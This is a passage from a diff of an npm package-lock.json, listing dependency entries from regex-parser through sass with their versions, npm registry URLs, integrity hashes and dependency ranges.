"https://registry.npmjs.org/regex-parser/-/regex-parser-2.3.0.tgz", + "integrity": "sha512-TVILVSz2jY5D47F4mA4MppkBrafEaiUWJO/TcZHEIuI13AqoZMkK1WMA4Om1YkYbTx+9Ki1/tSUXbceyr9saRg==", + "dev": true + }, + "node_modules/regexp-tree": { + "version": "0.1.27", + "resolved": "https://registry.npmjs.org/regexp-tree/-/regexp-tree-0.1.27.tgz", + "integrity": "sha512-iETxpjK6YoRWJG5o6hXLwvjYAoW+FEZn9os0PD/b6AP6xQwsa/Y7lCVgIixBbUPMfhu+i2LtdeAqVTgGlQarfA==", + "dev": true, + "bin": { + "regexp-tree": "bin/regexp-tree" + } + }, + "node_modules/regexp.prototype.flags": { + "version": "1.5.2", + "resolved": "https://registry.npmjs.org/regexp.prototype.flags/-/regexp.prototype.flags-1.5.2.tgz", + "integrity": "sha512-NcDiDkTLuPR+++OCKB0nWafEmhg/Da8aUPLPMQbK+bxKKCm1/S5he+AqYa4PlMCVBalb4/yxIRub6qkEx5yJbw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.6", + "define-properties": "^1.2.1", + "es-errors": "^1.3.0", + "set-function-name": "^2.0.1" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/regexparam": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/regexparam/-/regexparam-3.0.0.tgz", + "integrity": "sha512-RSYAtP31mvYLkAHrOlh25pCNQ5hWnT106VukGaaFfuJrZFkGRX5GhUAdPqpSDXxOhA2c4akmRuplv1mRqnBn6Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, + "node_modules/regexpp": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/regexpp/-/regexpp-3.2.0.tgz", + "integrity": "sha512-pq2bWo9mVD43nbts2wGv17XLiNLya+GklZ8kaDLV2Z08gDCsGpnKn9BFMepvWuHCbyVvY7J5o5+BVvoQbmlJLg==", + "dev": true, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/mysticatea" + } + }, + "node_modules/regexpu-core": { + "version": "5.3.2", + "resolved": "https://registry.npmjs.org/regexpu-core/-/regexpu-core-5.3.2.tgz", + "integrity": "sha512-RAM5FlZz+Lhmo7db9L298p2vHP5ZywrVXmVXpmAD9GuL5MPH6t9ROw1iA/wfHkQ76Qe7AaPF0nGuim96/IrQMQ==", + "dev": true, + "dependencies": { + "@babel/regjsgen": "^0.8.0", + "regenerate": "^1.4.2", + "regenerate-unicode-properties": "^10.1.0", + "regjsparser": "^0.9.1", + "unicode-match-property-ecmascript": "^2.0.0", + "unicode-match-property-value-ecmascript": "^2.1.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/regjsparser": { + "version": "0.9.1", + "resolved": "https://registry.npmjs.org/regjsparser/-/regjsparser-0.9.1.tgz", + "integrity": "sha512-dQUtn90WanSNl+7mQKcXAgZxvUe7Z0SqXlgzv0za4LwiUhyzBC58yQO3liFoUgu8GiJVInAhJjkj1N0EtQ5nkQ==", + "dev": true, + "dependencies": { + "jsesc": "~0.5.0" + }, + "bin": { + "regjsparser": "bin/parser" + } + }, + "node_modules/regjsparser/node_modules/jsesc": { + "version": "0.5.0", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-0.5.0.tgz", + "integrity": "sha512-uZz5UnB7u4T9LvwmFqXii7pZSouaRPorGs5who1Ip7VO0wxanFvBL7GkM6dTHlgX+jhBApRetaWpnDabOeTcnA==", + "dev": true, + "bin": { + "jsesc": "bin/jsesc" + } + }, + "node_modules/relateurl": { + "version": "0.2.7", + "resolved": "https://registry.npmjs.org/relateurl/-/relateurl-0.2.7.tgz", + "integrity": "sha1-VNvzd+UUQKypCkzSdGANP/LYiKk=", + "dev": true, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/remove-accents": { + "version": "0.4.2", + "resolved": "https://registry.npmjs.org/remove-accents/-/remove-accents-0.4.2.tgz", + "integrity": "sha1-CkPTqq4egNuRngeuJUsoXZ4ce7U=", + "dev": true + }, + "node_modules/remove-trailing-separator": { + "version": "1.1.0", + "resolved": 
"https://registry.npmjs.org/remove-trailing-separator/-/remove-trailing-separator-1.1.0.tgz", + "integrity": "sha512-/hS+Y0u3aOfIETiaiirUFwDBDzmXPvO+jAfKTitUngIPzdKc6Z0LoFjM/CK5PL4C+eKwHohlHAb6H0VFfmmUsw==", + "dev": true + }, + "node_modules/renderkid": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/renderkid/-/renderkid-3.0.0.tgz", + "integrity": "sha512-q/7VIQA8lmM1hF+jn+sFSPWGlMkSAeNYcPLmDQx2zzuiDfaLrOmumR8iaUKlenFgh0XRPIUeSPlH3A+AW3Z5pg==", + "dev": true, + "dependencies": { + "css-select": "^4.1.3", + "dom-converter": "^0.2.0", + "htmlparser2": "^6.1.0", + "lodash": "^4.17.21", + "strip-ansi": "^6.0.1" + } + }, + "node_modules/repeat-element": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/repeat-element/-/repeat-element-1.1.4.tgz", + "integrity": "sha512-LFiNfRcSu7KK3evMyYOuCzv3L10TW7yC1G2/+StMjK8Y6Vqd2MG7r/Qjw4ghtuCOjFvlnms/iMmLqpvW/ES/WQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/repeat-string": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/repeat-string/-/repeat-string-1.6.1.tgz", + "integrity": "sha512-PV0dzCYDNfRi1jCDbJzpW7jNNDRuCOG/jI5ctQcGKt/clZD+YcPS3yIlWuTJMmESC8aevCFmWJy5wjAFgNqN6w==", + "dev": true, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/replace-ext": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/replace-ext/-/replace-ext-2.0.0.tgz", + "integrity": "sha512-UszKE5KVK6JvyD92nzMn9cDapSk6w/CaFZ96CnmDMUqH9oowfxF/ZjRITD25H4DnOQClLA4/j7jLGXXLVKxAug==", + "dev": true, + "engines": { + "node": ">= 10" + } + }, + "node_modules/request": { + "version": "2.88.2", + "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", + "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", + "deprecated": "request has been deprecated, see https://github.com/request/request/issues/3142", + "dependencies": { + "aws-sign2": "~0.7.0", + "aws4": "^1.8.0", + "caseless": "~0.12.0", + "combined-stream": "~1.0.6", + "extend": "~3.0.2", + "forever-agent": "~0.6.1", + "form-data": "~2.3.2", + "har-validator": "~5.1.3", + "http-signature": "~1.2.0", + "is-typedarray": "~1.0.0", + "isstream": "~0.1.2", + "json-stringify-safe": "~5.0.1", + "mime-types": "~2.1.19", + "oauth-sign": "~0.9.0", + "performance-now": "^2.1.0", + "qs": "~6.5.2", + "safe-buffer": "^5.1.2", + "tough-cookie": "~2.5.0", + "tunnel-agent": "^0.6.0", + "uuid": "^3.3.2" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/request-progress": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/request-progress/-/request-progress-3.0.0.tgz", + "integrity": "sha1-TKdUCBx/7GP1BeT6qCWqBs1mnb4=", + "dev": true, + "dependencies": { + "throttleit": "^1.0.0" + } + }, + "node_modules/request/node_modules/form-data": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", + "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.6", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 0.12" + } + }, + "node_modules/request/node_modules/qs": { + "version": "6.5.3", + "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", + "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/request/node_modules/tough-cookie": { + "version": "2.5.0", + 
"resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", + "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", + "dependencies": { + "psl": "^1.1.28", + "punycode": "^2.1.1" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/requestretry": { + "version": "7.1.0", + "resolved": "https://registry.npmjs.org/requestretry/-/requestretry-7.1.0.tgz", + "integrity": "sha512-TqVDgp251BW4b8ddQ2ptaj/57Z3LZHLscAUT7v6qs70buqF2/IoOVjYbpjJ6HiW7j5+waqegGI8xKJ/+uzgDmw==", + "dependencies": { + "extend": "^3.0.2", + "lodash": "^4.17.15" + }, + "peerDependencies": { + "request": "2.*.*" + } + }, + "node_modules/require-directory": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", + "integrity": "sha1-jGStX9MNqxyXbiNE/+f3kqam30I=", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/require-from-string": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/require-from-string/-/require-from-string-2.0.2.tgz", + "integrity": "sha512-Xf0nWe6RseziFMu+Ap9biiUbmplq6S9/p+7w7YXP/JBHhrUDDUhwa+vANyubuqfZWTveU//DYVGsDG7RKL/vEw==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/require-like": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/require-like/-/require-like-0.1.2.tgz", + "integrity": "sha1-rW8wwTvs15cBDEaK+ndcDAprR/o=", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/require-main-filename": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/require-main-filename/-/require-main-filename-2.0.0.tgz", + "integrity": "sha512-NKN5kMDylKuldxYLSUfrbo5Tuzh4hd+2E8NPPX02mZtn1VuREQToYe/ZdlJy+J3uCpfaiGF05e7B8W0iXbQHmg==", + "dev": true + }, + "node_modules/requires-port": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/requires-port/-/requires-port-1.0.0.tgz", + "integrity": "sha1-kl0mAdOaxIXgkc8NpcbmlNw9yv8=" + }, + "node_modules/requizzle": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/requizzle/-/requizzle-0.2.4.tgz", + "integrity": "sha512-JRrFk1D4OQ4SqovXOgdav+K8EAhSB/LJZqCz8tbX0KObcdeM15Ss59ozWMBWmmINMagCwmqn4ZNryUGpBsl6Jw==", + "dependencies": { + "lodash": "^4.17.21" + } + }, + "node_modules/reselect": { + "version": "4.1.8", + "resolved": "https://registry.npmjs.org/reselect/-/reselect-4.1.8.tgz", + "integrity": "sha512-ab9EmR80F/zQTMNeneUr4cv+jSwPJgIlvEmVwLerwrWVbpLlBuls9XHzIeTFy4cegU2NHBp3va0LKOzU5qFEYQ==", + "dev": true + }, + "node_modules/resolve": { + "version": "1.22.8", + "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", + "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", + "dependencies": { + "is-core-module": "^2.13.0", + "path-parse": "^1.0.7", + "supports-preserve-symlinks-flag": "^1.0.0" + }, + "bin": { + "resolve": "bin/resolve" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/resolve-cwd": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", + "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", + "dev": true, + "dependencies": { + "resolve-from": "^5.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/resolve-from": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", + "integrity": 
"sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", + "engines": { + "node": ">=8" + } + }, + "node_modules/resolve-options": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/resolve-options/-/resolve-options-2.0.0.tgz", + "integrity": "sha512-/FopbmmFOQCfsCx77BRFdKOniglTiHumLgwvd6IDPihy1GKkadZbgQJBcTb2lMzSR1pndzd96b1nZrreZ7+9/A==", + "dev": true, + "dependencies": { + "value-or-function": "^4.0.0" + }, + "engines": { + "node": ">= 10.13.0" + } + }, + "node_modules/resolve-url": { + "version": "0.2.1", + "resolved": "https://registry.npmjs.org/resolve-url/-/resolve-url-0.2.1.tgz", + "integrity": "sha512-ZuF55hVUQaaczgOIwqWzkEcEidmlD/xl44x1UZnhOXcYuFN2S6+rcxpG+C1N3So0wvNI3DmJICUFfu2SxhBmvg==", + "deprecated": "https://github.com/lydell/resolve-url#deprecated", + "dev": true + }, + "node_modules/resolve-url-loader": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/resolve-url-loader/-/resolve-url-loader-5.0.0.tgz", + "integrity": "sha512-uZtduh8/8srhBoMx//5bwqjQ+rfYOUq8zC9NrMUGtjBiGTtFJM42s58/36+hTqeqINcnYe08Nj3LkK9lW4N8Xg==", + "dev": true, + "dependencies": { + "adjust-sourcemap-loader": "^4.0.0", + "convert-source-map": "^1.7.0", + "loader-utils": "^2.0.0", + "postcss": "^8.2.14", + "source-map": "0.6.1" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/restore-cursor": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/restore-cursor/-/restore-cursor-3.1.0.tgz", + "integrity": "sha512-l+sSefzHpj5qimhFSE5a8nufZYAM3sBSVMAPtYkmC+4EH2anSGaEMXSD0izRQbu9nfyQ9y5JrVmp7E8oZrUjvA==", + "dev": true, + "dependencies": { + "onetime": "^5.1.0", + "signal-exit": "^3.0.2" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/ret": { + "version": "0.1.15", + "resolved": "https://registry.npmjs.org/ret/-/ret-0.1.15.tgz", + "integrity": "sha512-TTlYpa+OL+vMMNG24xSlQGEJ3B/RzEfUlLct7b5G/ytav+wPrplCpVMFuwzXbkecJrb6IYo1iFb0S9v37754mg==", + "dev": true, + "engines": { + "node": ">=0.12" + } + }, + "node_modules/retry": { + "version": "0.13.1", + "resolved": "https://registry.npmjs.org/retry/-/retry-0.13.1.tgz", + "integrity": "sha512-XQBQ3I8W1Cge0Seh+6gjj03LbmRFWuoszgK9ooCpwYIrhhoO80pfq4cUkU5DkknwfOfFteRwlZ56PYOGYyFWdg==", + "engines": { + "node": ">= 4" + } + }, + "node_modules/retry-as-promised": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/retry-as-promised/-/retry-as-promised-7.0.4.tgz", + "integrity": "sha512-XgmCoxKWkDofwH8WddD0w85ZfqYz+ZHlr5yo+3YUCfycWawU56T5ckWXsScsj5B8tqUcIG67DxXByo3VUgiAdA==" + }, + "node_modules/retry-request": { + "version": "4.2.2", + "resolved": "https://registry.npmjs.org/retry-request/-/retry-request-4.2.2.tgz", + "integrity": "sha512-xA93uxUD/rogV7BV59agW/JHPGXeREMWiZc9jhcwY4YdZ7QOtC7qbomYg0n4wyk2lJhggjvKvhNX8wln/Aldhg==", + "dependencies": { + "debug": "^4.1.1", + "extend": "^3.0.2" + }, + "engines": { + "node": ">=8.10.0" + } + }, + "node_modules/reusify": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", + "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==", + "engines": { + "iojs": ">=1.0.0", + "node": ">=0.10.0" + } + }, + "node_modules/rfdc": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/rfdc/-/rfdc-1.3.0.tgz", + "integrity": "sha512-V2hovdzFbOi77/WajaSMXk2OLm+xNIeQdMMuB7icj7bk6zi2F8GGAxigcnDFpJHbNyNcgyJDiP+8nOrY5cZGrA==", + "dev": true + }, + "node_modules/rndm": { + "version": "1.2.0", + "resolved": 
"https://registry.npmjs.org/rndm/-/rndm-1.2.0.tgz", + "integrity": "sha1-8z/pz7Urv9UgqhgyO8ZdsRCht2w=" + }, + "node_modules/route-recognizer": { + "version": "0.3.4", + "resolved": "https://registry.npmjs.org/route-recognizer/-/route-recognizer-0.3.4.tgz", + "integrity": "sha512-2+MhsfPhvauN1O8KaXpXAOfR/fwe8dnUXVM+xw7yt40lJRfPVQxV6yryZm0cgRvAj5fMF/mdRZbL2ptwbs5i2g==", + "dev": true + }, + "node_modules/run-applescript": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/run-applescript/-/run-applescript-7.0.0.tgz", + "integrity": "sha512-9by4Ij99JUr/MCFBUkDKLWK3G9HVXmabKz9U5MlIAIuvuzkiOicRYs8XJLxX+xahD+mLiiCYDqF9dKAgtzKP1A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/run-parallel": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", + "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ], + "dependencies": { + "queue-microtask": "^1.2.2" + } + }, + "node_modules/rxjs": { + "version": "7.5.5", + "resolved": "https://registry.npmjs.org/rxjs/-/rxjs-7.5.5.tgz", + "integrity": "sha512-sy+H0pQofO95VDmFLzyaw9xNJU4KTRSwQIGM6+iG3SypAtCiLDzpeG8sJrNCWn2Up9km+KhkvTdbkrdy+yzZdw==", + "dev": true, + "dependencies": { + "tslib": "^2.1.0" + } + }, + "node_modules/safe-array-concat": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/safe-array-concat/-/safe-array-concat-1.1.2.tgz", + "integrity": "sha512-vj6RsCsWBCf19jIeHEfkRMw8DPiBb+DMXklQ/1SGDHOMlHdPUkZXFQ2YdplS23zESTijAcurb1aSgJA3AgMu1Q==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.7", + "get-intrinsic": "^1.2.4", + "has-symbols": "^1.0.3", + "isarray": "^2.0.5" + }, + "engines": { + "node": ">=0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/safe-buffer": { + "version": "5.1.2", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.1.2.tgz", + "integrity": "sha512-Gd2UZBJDkXlY7GbJxfsE8/nvKkUEU1G38c1siN6QP6a9PT9MmHB8GnpscSmMJSoF8LOIrt8ud/wPtojys4G6+g==" + }, + "node_modules/safe-json-stringify": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/safe-json-stringify/-/safe-json-stringify-1.2.0.tgz", + "integrity": "sha512-gH8eh2nZudPQO6TytOvbxnuhYBOvDBBLW52tz5q6X58lJcd/tkmqFR+5Z9adS8aJtURSXWThWy/xJtJwixErvg==", + "optional": true + }, + "node_modules/safe-regex": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/safe-regex/-/safe-regex-1.1.0.tgz", + "integrity": "sha512-aJXcif4xnaNUzvUuC5gcb46oTS7zvg4jpMTnuqtrEPlR3vFr4pxtdTwaF1Qs3Enjn9HK+ZlwQui+a7z0SywIzg==", + "dev": true, + "dependencies": { + "ret": "~0.1.10" + } + }, + "node_modules/safe-regex-test": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/safe-regex-test/-/safe-regex-test-1.0.3.tgz", + "integrity": "sha512-CdASjNJPvRa7roO6Ra/gLYBTzYzzPyyBXxIMdGW3USQLyjWEls2RgW5UBTXaQVp+OrpeCK3bLem8smtmheoRuw==", + "license": "MIT", + "dependencies": { + "call-bind": "^1.0.6", + "es-errors": "^1.3.0", + "is-regex": "^1.1.4" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/safer-buffer": { + "version": 
"2.1.2", + "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", + "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" + }, + "node_modules/saml": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/saml/-/saml-3.0.1.tgz", + "integrity": "sha512-bOjVqZcHY8PkdTBD7Y27KHykC7403BEM46SeCq5r0QPNEPE7M7RmWKy7hPjYsID9VNkCNSHYSVrrRS8Y9hNVWA==", + "dependencies": { + "@xmldom/xmldom": "^0.7.4", + "async": "^3.2.4", + "moment": "^2.29.4", + "valid-url": "~1.0.9", + "xml-crypto": "^2.1.3", + "xml-encryption": "^2.0.0", + "xml-name-validator": "~2.0.1", + "xpath": "0.0.5" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/saml/node_modules/xml-crypto": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/xml-crypto/-/xml-crypto-2.1.6.tgz", + "integrity": "sha512-jjvpO8vHNV8QFhW5bMypP+k4BjBqHe/HrpIwpPcdUnUTIJakSIuN96o3Sdah4tKu2z64kM/JHEH8iEHGCc6Gyw==", + "license": "MIT", + "dependencies": { + "@xmldom/xmldom": "^0.7.9", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/saml/node_modules/xml-crypto/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "license": "MIT", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/saml/node_modules/xml-name-validator": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/xml-name-validator/-/xml-name-validator-2.0.1.tgz", + "integrity": "sha512-jRKe/iQYMyVJpzPH+3HL97Lgu5HrCfii+qSo+TfjKHtOnvbnvdVfMYrn9Q34YV81M2e5sviJlI6Ko9y+nByzvA==" + }, + "node_modules/samlp": { + "version": "7.0.2", + "resolved": "https://registry.npmjs.org/samlp/-/samlp-7.0.2.tgz", + "integrity": "sha512-ajROyMKj4HKqXEbThx5ktsMWRsIGziAWWgh9ObnzobUJgCObSUPB13KM9G50huIQffMy3lXx87JDhzYXg5iJ5A==", + "dependencies": { + "@auth0/thumbprint": "0.0.6", + "@auth0/xmldom": "0.1.21", + "auth0-id-generator": "^0.2.0", + "ejs": "^3.1.8", + "flowstate": "^0.4.0", + "querystring": "^0.2.0", + "saml": "^3.0.1", + "xml-crypto": "^2.0.0", + "xpath": "0.0.5", + "xtend": "^1.0.3" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/samlp/node_modules/xml-crypto": { + "version": "2.1.6", + "resolved": "https://registry.npmjs.org/xml-crypto/-/xml-crypto-2.1.6.tgz", + "integrity": "sha512-jjvpO8vHNV8QFhW5bMypP+k4BjBqHe/HrpIwpPcdUnUTIJakSIuN96o3Sdah4tKu2z64kM/JHEH8iEHGCc6Gyw==", + "license": "MIT", + "dependencies": { + "@xmldom/xmldom": "^0.7.9", + "xpath": "0.0.32" + }, + "engines": { + "node": ">=0.4.0" + } + }, + "node_modules/samlp/node_modules/xml-crypto/node_modules/xpath": { + "version": "0.0.32", + "resolved": "https://registry.npmjs.org/xpath/-/xpath-0.0.32.tgz", + "integrity": "sha512-rxMJhSIoiO8vXcWvSifKqhvV96GjiD5wYb8/QHdoRyQvraTpp4IEv944nhGausZZ3u7dhQXteZuZbaqfpB7uYw==", + "license": "MIT", + "engines": { + "node": ">=0.6.0" + } + }, + "node_modules/samlp/node_modules/xtend": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/xtend/-/xtend-1.0.3.tgz", + "integrity": "sha1-P12Tc1PM7Y4IU5mlY/2yJUHClgo=", + "engines": { + "node": ">=0.4" + } + }, + "node_modules/sandboxed-module": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/sandboxed-module/-/sandboxed-module-2.0.4.tgz", + "integrity": "sha512-AwEPOdO8mg/wJjr876yCHP2DHqVN0MaggEXhp6IIf3bcI5cYoQl9QrrCHSrvToHjvdEiS5x4TVZRgjD2bEmNTA==", + "dev": true, + 
"dependencies": { + "require-like": "0.1.2", + "stack-trace": "0.0.9" + } + }, + "node_modules/sanitize-html": { + "version": "2.12.1", + "resolved": "https://registry.npmjs.org/sanitize-html/-/sanitize-html-2.12.1.tgz", + "integrity": "sha512-Plh+JAn0UVDpBRP/xEjsk+xDCoOvMBwQUf/K+/cBAVuTbtX8bj2VB7S1sL1dssVpykqp0/KPSesHrqXtokVBpA==", + "dependencies": { + "deepmerge": "^4.2.2", + "escape-string-regexp": "^4.0.0", + "htmlparser2": "^8.0.0", + "is-plain-object": "^5.0.0", + "parse-srcset": "^1.0.2", + "postcss": "^8.3.11" + } + }, + "node_modules/sanitize-html/node_modules/dom-serializer": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/dom-serializer/-/dom-serializer-2.0.0.tgz", + "integrity": "sha512-wIkAryiqt/nV5EQKqQpo3SToSOV9J0DnbJqwK7Wv/Trc92zIAYZ4FlMu+JPFW1DfGFt81ZTCGgDEabffXeLyJg==", + "dependencies": { + "domelementtype": "^2.3.0", + "domhandler": "^5.0.2", + "entities": "^4.2.0" + }, + "funding": { + "url": "https://github.com/cheeriojs/dom-serializer?sponsor=1" + } + }, + "node_modules/sanitize-html/node_modules/domhandler": { + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/domhandler/-/domhandler-5.0.3.tgz", + "integrity": "sha512-cgwlv/1iFQiFnU96XXgROh8xTeetsnJiDsTc7TYCLFd9+/WNkIqPTxiM/8pSd8VIrhXGTf1Ny1q1hquVqDJB5w==", + "dependencies": { + "domelementtype": "^2.3.0" + }, + "engines": { + "node": ">= 4" + }, + "funding": { + "url": "https://github.com/fb55/domhandler?sponsor=1" + } + }, + "node_modules/sanitize-html/node_modules/domutils": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/domutils/-/domutils-3.0.1.tgz", + "integrity": "sha512-z08c1l761iKhDFtfXO04C7kTdPBLi41zwOZl00WS8b5eiaebNpY00HKbztwBq+e3vyqWNwWF3mP9YLUeqIrF+Q==", + "dependencies": { + "dom-serializer": "^2.0.0", + "domelementtype": "^2.3.0", + "domhandler": "^5.0.1" + }, + "funding": { + "url": "https://github.com/fb55/domutils?sponsor=1" + } + }, + "node_modules/sanitize-html/node_modules/entities": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/entities/-/entities-4.4.0.tgz", + "integrity": "sha512-oYp7156SP8LkeGD0GF85ad1X9Ai79WtRsZ2gxJqtBuzH+98YUV6jkHEKlZkMbcrjJjIVJNIDP/3WL9wQkoPbWA==", + "engines": { + "node": ">=0.12" + }, + "funding": { + "url": "https://github.com/fb55/entities?sponsor=1" + } + }, + "node_modules/sanitize-html/node_modules/htmlparser2": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.1.tgz", + "integrity": "sha512-4lVbmc1diZC7GUJQtRQ5yBAeUCL1exyMwmForWkRLnwyzWBFxN633SALPMGYaWZvKe9j1pRZJpauvmxENSp/EA==", + "funding": [ + "https://github.com/fb55/htmlparser2?sponsor=1", + { + "type": "github", + "url": "https://github.com/sponsors/fb55" + } + ], + "dependencies": { + "domelementtype": "^2.3.0", + "domhandler": "^5.0.2", + "domutils": "^3.0.1", + "entities": "^4.3.0" + } + }, + "node_modules/sanitize-html/node_modules/is-plain-object": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/is-plain-object/-/is-plain-object-5.0.0.tgz", + "integrity": "sha512-VRSzKkbMm5jMDoKLbltAkFQ5Qr7VDiTFGXxYFXXowVj387GeGNOCsOH6Msy00SGZ3Fp84b1Naa1psqgcCIEP5Q==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/sass": { + "version": "1.77.1", + "resolved": "https://registry.npmjs.org/sass/-/sass-1.77.1.tgz", + "integrity": "sha512-OMEyfirt9XEfyvocduUIOlUSkWOXS/LAt6oblR/ISXCTukyavjex+zQNm51pPCOiFKY1QpWvEH1EeCkgyV3I6w==", + "dev": true, + "dependencies": { + "chokidar": ">=3.0.0 <4.0.0", + "immutable": "^4.0.0", + "source-map-js": ">=0.6.2 <2.0.0" + }, + "bin": { + 
